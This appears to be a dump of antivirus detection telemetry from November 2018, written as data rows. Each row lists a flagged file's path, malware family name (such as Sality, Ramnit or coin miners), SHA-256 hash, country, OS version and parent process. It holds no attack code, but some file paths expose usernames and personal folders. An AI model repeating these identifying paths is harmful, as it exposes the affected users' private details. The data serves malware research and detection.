  Row(detection=Row(filename='a0048189.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0048189.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\BKP HD PROBLEMA\\Desktop\\Lixo 2\\Desktop 2015\\Programas Eli\\Driver Acer Preto\\Windows 7\\Bluetooth_Broadcom_6.3.0.7300_W7x64_A\\Bluetooth_Broadcom_6.3.0.7300_W7x64\\Win32\\Setup.exe', filesize=948000, name='W32/Neshta.A.#M1.#R1'), hash='d14e03debb9260c13a9e2f3bf97b37f4df980966303ab775b8656f8eed60acea', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='badanti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\BADANTI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172226-5c235541', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73ccddd8\\AVSCAN-20181101-172204-57FD74D8\\AVSCAN-20181101-172226-5C235541', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094413-fc0a5f0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094413-FC0A5F0C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094311-f0017d15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094311-F0017D15', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104738-6738a0e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7983e27\\AVSCAN-20181101-104516-535EDC29\\AVSCAN-20181101-104738-6738A0E3', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d8cf028d5f2891f0ed68774e201f057ae589aeadcc041a21bdf72776b4b8a9de', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:47:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110206-0d479e68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118ac77b\\AVSCAN-20181101-094023-456A0C31\\AVSCAN-20181101-110206-0D479E68', filesize=2112000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='cf832cc7ae0c84a63de59273102cb35b9b650dbf9e479010e7eab9a00507a079', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='combinati.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\ASA 581042\\COMBINATI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proshow.producer.7.0-patch.exe', filepath='C:\\Program Files (x86)\\Photodex\\ProShow Producer\\proshow.producer.7.0-patch.exe', filesize=3584000, name='SPR/Hacktool.3584000.#M1.#R1'), hash='ed5e28440b04dedb1a10c749962f5ef0d70856773e3f70ed2b349097c5931190', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:25:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="domande d'esame.exe", filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ESAMI SETTEMBRE 2017\\ASA\\domande d'esame.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='immagini tattoo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI ALLA PERSONA\\OPERATORE TATUAGGI E PIERCING\\immagini tattoo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094726-20f99ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094726-20F99FF1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164423-a2ffb6eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-164423-A2FFB6EB', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='cd4ac8d5b574de69d3fdafa613fc92de2570b91b65537a6ad18518275d24b2e5', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T23:31:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vikash lok tihar.exe', filepath='F:\\VIKASH LOK TIHAR\\VIKASH LOK TIHAR.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\cjyoakzcrcz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:47:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150231-a961e06f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150231-A961E06F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='makecert.exe', filepath='\\\\?\\F:\\Autocad2008\\x64\\support\\VBA\\pFiles\\MSOffice\\Office10\\makecert.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='8903af62a5cb519c66b7a3e6a650180a0a37ba9418a1ac111d65f2c4f86a2fba', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:18:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-4551c87a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-4551C87A', filesize=64000, name='VBA/Dldr.Agent.jwpvr.#M1.#R1'), hash='932852003f0eeca3b53e7b41990143fbb88010116ff01e297bc023d6ce4a677a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-230426-37b7dd24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230426-37B7DD24', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082746-c49e46f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1bc9eed\\AVSCAN-20181104-082215-9B97DC43\\AVSCAN-20181104-082746-C49E46F1', filesize=14360000, name='PUA/Systweak.#M1.#R1'), hash='26e89330408d7767d0c79c705d1fa66beef31e3841edb1f338ebb4f15237cc1b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:27:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T05:52:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-3916738295-1235622307-4136539673-1002\\$RC49BQZ\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T00:52:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T21:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0343115.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP434\\A0343115.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:17:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134105-94c4a139', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94ce1b23\\AVSCAN-20181104-133442-66029BA9\\AVSCAN-20181104-134105-94C4A139', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144334-2b09ff88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7ed61ca\\AVSCAN-20181104-144152-1EAE94FB\\AVSCAN-20181104-144334-2B09FF88', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:43:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:48:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135302-ec326eb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94ce1b23\\AVSCAN-20181104-133442-66029BA9\\AVSCAN-20181104-135302-EC326EB6', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131306-1fa2b0e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131306-1FA2B0E1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T04:48:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\PROGRAM FILES\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:31:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qmixer.dll', filepath='\\\\جهاز3\\العاب (e)\\العاب\\لعبة كراش عربيات\\Direct3D\\QMIXER.DLL', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='616c76fd029384ecaa6bd713c4ccedc008af097850b00d367a134dfd2d5440ef', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T19:50:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240f0', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240f0', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spl drumxchanger.dll', filepath='/Users/Baudry/Documents/Vuze Downloads/Plugin.Alliance.All.Bundle.v3.1.Incl.Keygen-R2R/ProgramData/Plugin Alliance/x86/SPL DrumXchanger.dll', filesize=10176000, name='TR/Crypt.XPACK.Gen.#M2.#R2290'), hash='152e300e3063a9d6182c926f4534c5b9c0e62c7b709fdfa0c60e19a4a09fb7c9', metadata=Row(cmdline=None, country='BE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:23:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132424-52e52050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132424-52E52050', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:57:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='camstudio.exe', filepath='d:\\downloads\\pc\\tools\\video\\camstudio.exe', filesize=2156000, name='PUA/InstallCore.#M1.#R1'), hash='2d33b5762cb161d79885744e4852cf194fd9fb0c8b582d05a370ee06e62b9c3c', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:22:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0344296.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP436\\A0344296.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:24:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a15377e2c7b7a927667db893fcf0ba5d591b60a764d1dbf81017edc977687a65', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A15377E2C7B7A927667DB893FCF0BA5D591B60A764D1DBF81017EDC977687A65', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a15377e2c7b7a927667db893fcf0ba5d591b60a764d1dbf81017edc977687a65', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:13:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210042-5eb8055a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210042-5EB8055A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdatafat.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATAFAT.exe', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190616-d2256201', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b343094\\AVSCAN-20181104-190429-C8275BC2\\AVSCAN-20181104-190616-D2256201', filesize=384000, name='TR/Dldr.AutoHK.rjoob.#M1.#R1'), hash='8f9071b1fb905289828df92b59cc96a6999bdad492e68e3dcc5ab8084dd4c219', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:07:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003409.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003409.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='05f89f324857b58ffc3392f104897a2f1f07d4b248b8063ec747ff458e0b6b46', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064251-6481e64d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-064251-6481E64D', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='be585185e1bfcdbf386f82a7a88b9fd501ade8545af0a25d6550612392143655', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:43:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
